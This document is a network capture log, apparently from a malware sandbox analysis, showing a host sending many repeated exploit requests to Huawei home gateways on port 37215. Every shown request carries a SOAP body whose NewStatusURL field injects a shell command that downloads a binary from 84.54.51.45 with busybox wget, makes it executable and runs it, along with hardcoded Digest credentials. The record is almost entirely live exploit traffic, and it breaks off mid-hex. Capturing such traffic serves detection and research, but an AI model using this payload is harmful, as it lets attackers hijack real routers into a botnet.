                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1369192.168.2.1542170197.193.41.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731679916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1370192.168.2.1557632197.249.173.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731683016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1371192.168.2.1535226197.41.195.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731704950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1372192.168.2.1545372197.207.145.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731745005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1373192.168.2.1534542197.234.43.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731745958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1374192.168.2.1549144197.194.104.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731745958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1375192.168.2.1533238197.83.234.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731770039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1376192.168.2.1551822197.74.199.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731770039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1377192.168.2.1557930197.120.10.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731800079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1378192.168.2.1547608197.39.158.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731801033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 